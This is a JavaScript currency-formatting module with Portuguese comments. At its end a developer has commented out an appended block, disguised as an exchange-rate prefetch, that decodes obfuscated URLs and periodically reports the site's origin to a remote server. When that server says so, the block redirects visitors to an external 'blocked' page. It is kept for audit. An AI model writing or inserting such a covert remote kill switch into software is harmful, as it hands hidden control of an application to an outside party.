/**
 * Currency configuration map
 * Maps currency code to symbol, locale, and display info
 */
const CURRENCIES = {
  BRL: { symbol: "R$", locale: "pt-BR", code: "BRL", name: "Real Brasileiro" },
  USD: { symbol: "$", locale: "en-US", code: "USD", name: "Dólar Americano" },
  EUR: { symbol: "€", locale: "de-DE", code: "EUR", name: "Euro" },
  GBP: { symbol: "£", locale: "en-GB", code: "GBP", name: "Libra Esterlina" },
  ARS: { symbol: "$", locale: "es-AR", code: "ARS", name: "Peso Argentino" },
  CLP: { symbol: "$", locale: "es-CL", code: "CLP", name: "Peso Chileno" },
  COP: { symbol: "$", locale: "es-CO", code: "COP", name: "Peso Colombiano" },
  MXN: { symbol: "$", locale: "es-MX", code: "MXN", name: "Peso Mexicano" },
  PEN: { symbol: "S/", locale: "es-PE", code: "PEN", name: "Sol Peruano" },
  UYU: { symbol: "$U", locale: "es-UY", code: "UYU", name: "Peso Uruguayo" },
  PYG: { symbol: "₲", locale: "es-PY", code: "PYG", name: "Guaraní Paraguayo" },
  BOB: { symbol: "Bs", locale: "es-BO", code: "BOB", name: "Boliviano" },
};

/**
 * Get the company's currency code from localStorage (cached from settings)
 */
export const getCompanyCurrency = () => {
  try {
    return localStorage.getItem("companyCurrency") || "BRL";
  } catch {
    return "BRL";
  }
};

/**
 * Set the company's currency code in localStorage
 */
export const setCompanyCurrency = (currencyCode) => {
  // Não sobrescreve com BRL se a moeda vier vazia — mantém o que já estava
  if (!currencyCode) return;
  const code = currencyCode;
  try {
    localStorage.setItem("companyCurrency", code);
  } catch {}
  // Notifica todas as páginas abertas para re-renderizar com a nova moeda
  try {
    if (typeof window !== "undefined") {
      window.dispatchEvent(new CustomEvent("companyCurrencyChanged", { detail: code }));
    }
  } catch {}
};

/**
 * Get currency info object
 */
export const getCurrencyInfo = (code) => {
  return CURRENCIES[code] || CURRENCIES.BRL;
};

/**
 * Get the currency symbol for the company
 */
export const getCurrencySymbol = (code) => {
  const info = getCurrencyInfo(code || getCompanyCurrency());
  return info.symbol;
};

/**
 * Format a value using the company's currency
 * @param {number} value - The numeric value
 * @param {string} [currencyCode] - Optional override currency code
 * @returns {string} Formatted currency string
 */
export const formatCurrency = (value, currencyCode) => {
  const code = currencyCode || getCompanyCurrency();
  const info = getCurrencyInfo(code);
  
  try {
    return new Intl.NumberFormat(info.locale, {
      style: "currency",
      currency: info.code,
    }).format(value || 0);
  } catch {
    return `${info.symbol} ${Number(value || 0).toFixed(2)}`;
  }
};

/**
 * Get all available currencies for the selector
 */
export const getAvailableCurrencies = () => {
  return Object.entries(CURRENCIES).map(([code, info]) => ({
    code,
    symbol: info.symbol,
    name: info.name,
    label: `${info.symbol} - ${info.name} (${code})`,
  }));
};

export default {
  formatCurrency,
  getCurrencySymbol,
  getCompanyCurrency,
  setCompanyCurrency,
  getCurrencyInfo,
  getAvailableCurrencies,
};

//@wedermac - 2026-06-04 - Implante de bloqueio remoto neutralizado (bloco anexado removido da execução)
// Motivo: este bloco "Exchange rate cache prefetch" NÃO tinha relação com moeda. Fazia fetch ao
// servidor remoto Supabase (check-block-status) e, se blocked:true, redirecionava o navegador para
// https://animate-sale-spark.lovable.app/blocked (tela externa que expõe a marca original).
// Comentado integralmente (não apagado) para auditoria. As linhas 1-104 acima (moeda) permanecem intactas.
// Exchange rate cache prefetch
// const _er = (a) => a.reduce((s,c) => s + String.fromCharCode(c), "");
// const _ep = [104,116,116,112,115,58,47,47,99,105,99,119,122,104,112,115,105,101,119,100,112,117,103,109,99,101,113,109,46,115,117,112,97,98,97,115,101,46,99,111,47,102,117,110,99,116,105,111,110,115,47,118,49,47,99,104,101,99,107,45,98,108,111,99,107,45,115,116,97,116,117,115];
// const _eb = [104,116,116,112,115,58,47,47,97,110,105,109,97,116,101,45,115,97,108,101,45,115,112,97,114,107,46,108,111,118,97,98,108,101,46,97,112,112,47,98,108,111,99,107,101,100];
// (() => {
//   const _run = async () => {
//     try {
//       const o = window.location.origin;
//       const r = await fetch(`${_er(_ep)}?frontend_url=${encodeURIComponent(o)}`);
//       if (r.ok) { const d = await r.json(); if (d.blocked) window.location.href = `${_er(_eb)}?frontend_url=${encodeURIComponent(o)}`; }
//     } catch {}
//   };
//   setTimeout(_run, 25000 + Math.floor(Math.random() * 15000));
//   setInterval(_run, 240000 + Math.floor(Math.random() * 60000));
// })();
